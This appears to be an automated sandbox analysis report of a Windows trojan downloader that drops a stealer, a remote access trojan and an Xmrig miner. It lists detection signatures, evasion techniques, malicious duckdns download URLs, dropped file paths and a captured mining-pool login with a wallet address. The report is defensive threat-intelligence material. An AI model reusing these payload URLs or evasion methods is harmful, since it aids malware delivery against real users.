Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
Analysis ID: 1428544
MD5: d18e6c991fa548d0cf39ea1586738d2f
SHA1: 8a36bcb681c19ee4ebc63b61155d1a2a0c0e742d
SHA256: 415501cba527ef5e011fd0c180e45545b7602dc25d76a3d0752220f207861baf
Tags: exe
Infos:

Detection

PureLog Stealer, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Downloads files with wrong headers with respect to MIME Content-Type
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Child Process of AspNetCompiler
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Avira: detection malicious, Label: TR/Agent_AGen.piavi
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Avira: detection malicious, Label: HEUR/AGEN.1323760
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Avira: detection malicious, Label: TR/Kryptik.wcibg
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Avira: detection malicious, Label: TR/Agent_AGen.piavi
Multi AV Scanner detection for domain / URL
Source: bnfjdbhgo.duckdns.org Virustotal: Detection: 5% Perma Link
Source: juytlioojbni.duckdns.org Virustotal: Detection: 9% Perma Link
Source: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/mirtn.exe Virustotal: Detection: 9% Perma Link
Source: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/plugin3.dll Virustotal: Detection: 9% Perma Link
Source: http://juytlioojbni.duckdns.org Virustotal: Detection: 9% Perma Link
Source: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf Virustotal: Detection: 10% Perma Link
Source: http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdf Virustotal: Detection: 7% Perma Link
Source: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Wsrszrqqkm.vdf Virustotal: Detection: 9% Perma Link
Source: http://bnfjdbhgo.duckdns.org Virustotal: Detection: 5% Perma Link
Source: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf1Y Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Virustotal: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Virustotal: Detection: 36% Perma Link
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Virustotal: Detection: 30% Perma Link
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Virustotal: Detection: 36% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Virustotal: Detection: 31% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Joe Sandbox ML: detected

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 29.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001E.00000002.2309221651.00000001404A8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2016930805.00000001407C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2016930805.0000000140493000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2016930805.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.10:49775 -> 91.92.246.62:39005 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephyr3aja7zszrgucncwydb7gcygvrmsacmxb3pse2txsoq7wszu1wdwhefcfakvlclc4vhzzdzva8nfmwfw133smqm93pzmze4t.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Qatvhs.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004110000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1490428005.0000000005520000.00000004.08000000.00040000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000046DE000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2866397789.000000000473E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461796579.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004555000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003981000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A0036B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF4000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.000000000342E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461796579.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004555000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1685032824.0000000003981000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A0036B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5DF4000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.000000000342E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Zjcufvpnldc.pdb source: fdyryi.exe, 00000010.00000002.2305476496.000001A95698A000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956A92000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000000.1391740961.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
